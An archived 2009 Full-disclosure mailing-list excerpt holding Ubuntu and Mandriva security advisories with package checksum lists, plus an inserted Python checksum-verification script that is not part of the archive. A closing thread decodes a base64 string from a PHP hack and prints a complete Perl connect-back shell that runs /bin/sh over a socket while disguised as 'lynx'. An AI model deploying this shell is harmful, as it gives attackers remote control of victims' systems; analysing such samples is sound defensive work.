3c2be076fb6d9c61cb42d938a90b93d2 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 254734 4198117776b43f20ca6d70b554b81db7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 826298 b88f70f60cb48caa96add58750e5b4bd http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_amd64.deb Size/MD5: 218730 e76dcc4583433117dbd7b81a77a858f5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 44222898 8c37f41c90782d6f7a1bef130a33bebc http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 3042728 4542d11b7a0d330ba036246b518b7348 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 78320 a09d5ac38d8656b09b02f61de4a3a848 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 8031042 89edcd5c182b752bd4a81d53bb4fcf9c http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 226174 0837e3ee67b4f6cde742c775e037f458 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 150976 6405eb0e815c96e8627f2b4d136eff11 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 255144 0e40cab26f0632c3d8687def727799c5 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 716692 950b133f03721a6e850c39374211eed9 
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_i386.deb Size/MD5: 212318 32b6d850fe57e89ae8646adb606552df powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 49080148 8c660c35194a0d6ea0eaef04217fabee http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 2858774 459ccaa976dadf0a084d79a749a1117e http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 81422 ebce34e5fbdc9f9512eb52ff4722ae5b http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 9112744 6b2cda45169a8a9bb7b13afd2698a304 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 222260 6aae274c9ced525cd99cc4995a893118 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 163044 390f958f20ee78f041342d934b67edcd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 247834 3a4363d4e6b72e79826f46013328d975 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 816088 69bf430f8f920576685682d684dd0159 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_powerpc.deb Size/MD5: 215280 33d4ae48f71b7ac9c0b8a3ddaccbe9b9 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 
45627582 86289259deef3338488deff398981f8f http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 2858786 b846d70d98da5c911c56175900f38561 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 79926 b001d774bd2f4eeba25abe99aaf806f1 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 8498570 191dac8aa9174eefd1a0bdfe212b453a http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 222282 2dc8e2df944c5d49c4e7a409077eb3ff http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnspr4_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 152948 68af6ea71c2386cff897d0862f2025ab http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss-dev_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 247844 243fcbcde87e019f0e81748b9db25014 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/libnss3_1.firefox1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 727550 dcb087f639cc1fe8be4fea51c4034d28 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_sparc.deb Size/MD5: 212730 d74dc227e12ba13b96cb586edefe1c90 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/4627adf9/attachment.bin From jamie at canonical.com Wed Feb 11 01:43:03 2009 
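The Size/MD5 list in the advisory above is meant to be checked by a script, not read. The block below is an added example, not Canonical's tooling: it parses entries in either the advisory's own two-line layout or the flattened form the archive shows (three entries from USN-717-3 are embedded as the sample), then verifies a local file's size and MD5 against them. The package bytes in self_check() are constructed and the example.invalid URL is a placeholder.

```python
"""Parse a USN Size/MD5 list and check a downloaded package against it.

Added example, not Canonical's tooling. ADVISORY_EXCERPT is copied from the
USN-717-3 text above: the archive flattened the first two entries onto one
line, the third is shown in the advisory's original two-line layout, and
the parser accepts both. The package bytes used in self_check() are
constructed and example.invalid is a placeholder host.
"""
import hashlib
import re

ADVISORY_EXCERPT = """\
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1.diff.gz Size/MD5: 184569 201540f2560ee07d0a7b30d367ce41bd http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1.dsc Size/MD5: 1800 e8a6f2726dbc06dade12a0ebc19c7fae
  http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.15~prepatch080614j-0ubuntu1_all.deb
      Size/MD5:    53638 9a18c7067527411eababced232354e7c
"""

# URL, then "Size/MD5:", a decimal size and 32 hex digits; the whitespace
# between them may include newlines, which covers both layouts.
ENTRY = re.compile(r"(https?://\S+)\s+Size/MD5:\s+(\d+)\s+([0-9a-fA-F]{32})")


def parse_size_md5(text):
    """Map package file name -> (url, size, md5) for every Size/MD5 entry."""
    entries = {}
    for url, size, digest in ENTRY.findall(text):
        entries[url.rsplit("/", 1)[-1]] = (url, int(size), digest.lower())
    return entries


def verify_package(name, data, entries):
    """Return (ok, reason). Size goes first: it is free and catches truncation."""
    if name not in entries:
        return False, "not listed in advisory"
    _url, size, md5 = entries[name]
    if len(data) != size:
        return False, f"size {len(data)} != {size}"
    actual = hashlib.md5(data).hexdigest()
    if actual != md5:
        return False, f"md5 {actual} != {md5}"
    return True, "size and md5 match"


def self_check():
    """Positive case built from constructed bytes and a generated advisory line."""
    data = b"constructed package bytes, not a real .deb\n"
    line = (f"http://example.invalid/pool/demo_1.0_all.deb Size/MD5: {len(data)} "
            f"{hashlib.md5(data).hexdigest()}")
    return verify_package("demo_1.0_all.deb", data, parse_size_md5(line))


if __name__ == "__main__":
    import sys
    entries = parse_size_md5(ADVISORY_EXCERPT)
    if len(sys.argv) == 2:  # usage: script.py <downloaded package file>
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
        print(verify_package(sys.argv[1].rsplit("/", 1)[-1], blob, entries))
    else:
        for name, (_, size, md5) in entries.items():
            print(f"{name}  {size}  {md5}")
        print("self-check:", self_check())
```

MD5 here is a download-integrity check, not the trust anchor: the advisory mail carries a detached PGP signature (the application/pgp-signature part the archive scrubbed above) and apt verifies the signed Release file, so the condition to require is a matching digest after a clean signature check. Size is compared first because a truncated mirror download is the common failure and costs nothing to detect.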
From: jamie at canonical.com (Jamie Strandboge)
Date: Tue, 10 Feb 2009 19:43:03 -0600
Subject: [Full-disclosure] [USN-717-2] Firefox vulnerabilities
Message-ID: <20090211014302.GB3543@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-717-2             February 10, 2009
firefox-3.0 vulnerabilities
CVE-2009-0355, CVE-2009-0357
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  firefox                         2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1

After a standard system upgrade you need to restart Firefox to effect
the necessary changes.

Details follow:

A flaw was discovered in the browser engine when restoring closed tabs.
If a user were tricked into restoring a tab to a malicious website with
form input controls, an attacker could steal local files on the user's
system. (CVE-2009-0355)

Wladimir Palant discovered that Firefox did not restrict access to cookies
in HTTP response headers. If a user were tricked into opening a malicious
web page, a remote attacker could view sensitive information.
(CVE-2009-0357) Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1.diff.gz Size/MD5: 194096 3b0eb4a53c8a6f101d8e802172b35470 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1.dsc Size/MD5: 2410 1a4f7e3c168867fe00d15a9ab0fddbd0 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly.orig.tar.gz Size/MD5: 37773218 99f6660ed9a5123b99deb71a4e542beb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/firefox-dom-inspector_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_all.deb Size/MD5: 201368 31cb5c6d1a08cc7ba16bb639c91a0aaf amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 78163666 58624d232e8d4cfefd8aa0b3930f1645 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 3409228 2c70383c7fdb1c47dff030bcfc19c667 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 98652 96c04d01cb85d0e7bf7f6bd0a462217d http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 67370 d7c39e5768ab583dfd378dd8caaec8ad http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_amd64.deb Size/MD5: 10514542 e2848c8d832da591ee6738b6c83e46fe i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 77307750 06d768c4f6ff11b0e9a767d9430d1167 
http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 3389432 6d0f9551aad0bf24730ce9e8bd0e43a8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 91414 0e6b2a8b84b703e83daff329bec2aaa8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 66320 509349c58bd38c4c8d5c3f01c5f854d8 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_i386.deb Size/MD5: 9263558 5071f73cd799d6be6694ffc325ece112 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/firefox/firefox-dbg_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 77589024 34b1054c205c40487c6fb63a07b7f8ea http://ports.ubuntu.com/pool/main/f/firefox/firefox-dev_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 3387598 9f72cfde2387f9728124f32e82adab69 http://ports.ubuntu.com/pool/main/f/firefox/firefox-gnome-support_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 92266 b52a5d27e848f2b49642accce30457a1 http://ports.ubuntu.com/pool/main/f/firefox/firefox-libthai_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 66600 60206314a39b88285db5ff69efa2079c http://ports.ubuntu.com/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_lpia.deb Size/MD5: 9116162 08e770ab94d22ad21731033bb9569bc9 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dbg_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 80783090 7e7d643e7fba65302c52f6c250b826ac http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-dev_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 3202874 
ac1e5d66c385ddc6c52ac47d54408624 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-gnome-support_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 96388 1d752d1304bae4438e69e7176c853df7 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-libthai_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 67654 de86db9d630be0c23ac80d17bdc21552 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_2.0.0.21~20090209t122238+nobinonly-0ubuntu0.7.10.1_powerpc.deb Size/MD5: 10317856 2b66401173a009cfdc915156c3eafa7c -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090210/beedea2a/attachment.bin From jamie at canonical.com Wed Feb 11 01:41:21 2009 
From: jamie at canonical.com (Jamie Strandboge)
Date: Tue, 10 Feb 2009 19:41:21 -0600
Subject: [Full-disclosure] [USN-717-1] Firefox and Xulrunner vulnerabilities
Message-ID: <20090211014121.GA3543@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-717-1             February 10, 2009
firefox-3.0, xulrunner-1.9 vulnerabilities
CVE-2009-0352, CVE-2009-0353, CVE-2009-0354, CVE-2009-0355,
CVE-2009-0357, CVE-2009-0358
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  firefox-3.0                     3.0.6+nobinonly-0ubuntu0.8.04.1
  xulrunner-1.9                   1.9.0.6+nobinonly-0ubuntu0.8.04.1

Ubuntu 8.10:
  abrowser                        3.0.6+nobinonly-0ubuntu0.8.10.1
  firefox-3.0                     3.0.6+nobinonly-0ubuntu0.8.10.1
  xulrunner-1.9                   1.9.0.6+nobinonly-0ubuntu0.8.10.1

After a standard system upgrade you need to restart Firefox and any
applications that use xulrunner, such as Epiphany, to effect the
necessary changes.

Details follow:

Several flaws were discovered in the browser engine. These problems could
allow an attacker to crash the browser and possibly execute arbitrary code
with user privileges. (CVE-2009-0352, CVE-2009-0353)

A flaw was discovered in the JavaScript engine. An attacker could bypass
the same-origin policy in Firefox by utilizing a chrome XBL method and
execute arbitrary JavaScript within the context of another website.
(CVE-2009-0354)

A flaw was discovered in the browser engine when restoring closed tabs.
If a user were tricked into restoring a tab to a malicious website with
form input controls, an attacker could steal local files on the user's
system. (CVE-2009-0355)

Wladimir Palant discovered that Firefox did not restrict access to cookies
in HTTP response headers.
If a user were tricked into opening a malicious web page, a remote attacker could view sensitive information. (CVE-2009-0357) Paul Nel discovered that Firefox did not honor certain Cache-Control HTTP directives. A local attacker could exploit this to view private data in improperly cached pages of another user. (CVE-2009-0358) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 105962 9d1dd815f6901881c9d0c7e02ba4a75b http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2711 61ba06fa21dae6e6828921f22540d243 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly.orig.tar.gz Size/MD5: 11180629 f7306d068c261f95c284fba5a75a6c71 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1.diff.gz Size/MD5: 77638 2173124c73ad3095d97bf8960ec855a5 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1.dsc Size/MD5: 2776 a3dcb8b8fd26e1d802e9971a46e7e1f3 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly.orig.tar.gz Size/MD5: 41504221 c3b32d6f68af24a75e4c902cb2ddbc09 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65864 9dc2bf09e6fc28741544c4bfc5904738 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65876 8e290cff0732bac4b1ce1728b06f028b http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-granparadiso-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65840 30c689f5ecf7ec430353d713057cd971 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-trunk-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65818 
0cdaaf28707b274a5f73a54d8b1fa965 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65978 f962ffb3ed9dd6573956304e7cf1a4df http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65890 322b798cd164a5ce68de2866e1dc1162 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-3.0-venkman_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65836 0a000e41e94f5e60a83ded055748296a http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8968 61ba17d1e482222ac49f5f5a7d5d3913 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8964 2ad2759d85a104116cb36831b028ce07 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65870 aac931ab3ca46e329a4955a5bf6e76a3 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-granparadiso_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65828 a62f716f84713ecfa1a33408e3872bd2 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65818 10dc6e5214d80b1624114c37bb86f738 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-dom-inspector_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8946 c8fb67a942b0d7d77aae0222f5e29887 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65844 5b4ed7aa2e26b77b6c95bb44d3869750 http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-venkman_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 8934 ec245ae15b0ba68b501af7a188e20c78 
http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk_3.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 65806 726700c8e49d8e2ece5c84262ab82849 http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-dom-inspector_1.9.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 125468 591ac192642c55dd439ee6dd1d4a1a62 http://security.ubuntu.com/ubuntu/pool/universe/x/xulrunner-1.9/xulrunner-1.9-venkman_1.9.0.6+nobinonly-0ubuntu0.8.04.1_all.deb Size/MD5: 235298 194d01564975da1065f994fda7ec9c3a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 9028 a575ef97892b265117c921490478c749 http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 29740 49d84b67f840254959132b1568ae46be http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 1091924 5eb7c34ffbc5cac1ec3428fb6ff81daa http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-dev_1.9.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 4450518 8268133a51caf767e6bd3b7974e9c6f2 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9-gnome-support_1.9.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 48682 da2d1192a88c460a80fee528be093d73 http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9/xulrunner-1.9_1.9.0.6+nobinonly-0ubuntu0.8.04.1_amd64.deb Size/MD5: 9062436 75bb3c5a7a40c2c09832a5db61c5f320 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-dev_3.0.6+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 9026 dcb3ffe9961637a24f4a92900bf506cb http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.0.6+nobinonly-0ubuntu0.8.04.1_i386.deb Size/MD5: 25686 5c83329675e0bec00f0e1f6fa263be35 
From security at mandriva.com Wed Feb 11 04:17:00 2009
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 11 Feb 2009 05:17:00 +0100
Subject: [Full-disclosure] [ MDVSA-2009:035 ] gstreamer0.10-plugins-good

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:035
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gstreamer0.10-plugins-good
 Date    : February 10, 2009
 Affected: 2008.0, 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 Security vulnerabilities have been discovered and corrected in
 gstreamer0.10-plugins-good, which might allow remote attackers to
 execute arbitrary code via a malformed QuickTime media file
 (CVE-2009-0386, CVE-2009-0387, CVE-2009-0397).

 The updated packages have been patched to prevent this.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0386
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0387
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0397
 _______________________________________________________________________

 Updated Packages:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.
 You can obtain the GPG public key of the Mandriva Security Team
 by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From krakowlabs at gmail.com Wed Feb 11 05:17:32 2009
From: krakowlabs at gmail.com (Krakow Labs)
Date: Wed, 11 Feb 2009 00:17:32 -0500
Subject: [Full-disclosure] Fuzzing for Fun and Profit
Message-ID: <49925F6C.6020908@gmail.com>

New fuzzing paper titled "Fuzzing for Fun and Profit".

Text Available @ www.krakowlabs.com

From aepereyra at gmail.com Wed Feb 11 02:37:45 2009
From: aepereyra at gmail.com (Augusto Pereyra)
Date: Tue, 10 Feb 2009 23:37:45 -0300
Subject: [Full-disclosure] connect back PHP hack
In-Reply-To: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
References: <5d80962a0902101023g29cc0917h60a44ed8bbb1f98a@mail.gmail.com>
Message-ID: <3118e6cd0902101837l757456c9m8a362f5d28ffe090@mail.gmail.com>

This is encoded in base64. If you decode it you will see the following
program:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

If you want to do it yourself, visit
http://www.motobit.com/util/base64-decoder-encoder.asp, paste the base64
code and you will see the light.

Cool!!!!

Best regards,
Augusto Pereyra

On Tue, Feb 10, 2009 at 3:23 PM, sr. wrote:
> can anyone tell me what encoding this is?
>
> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
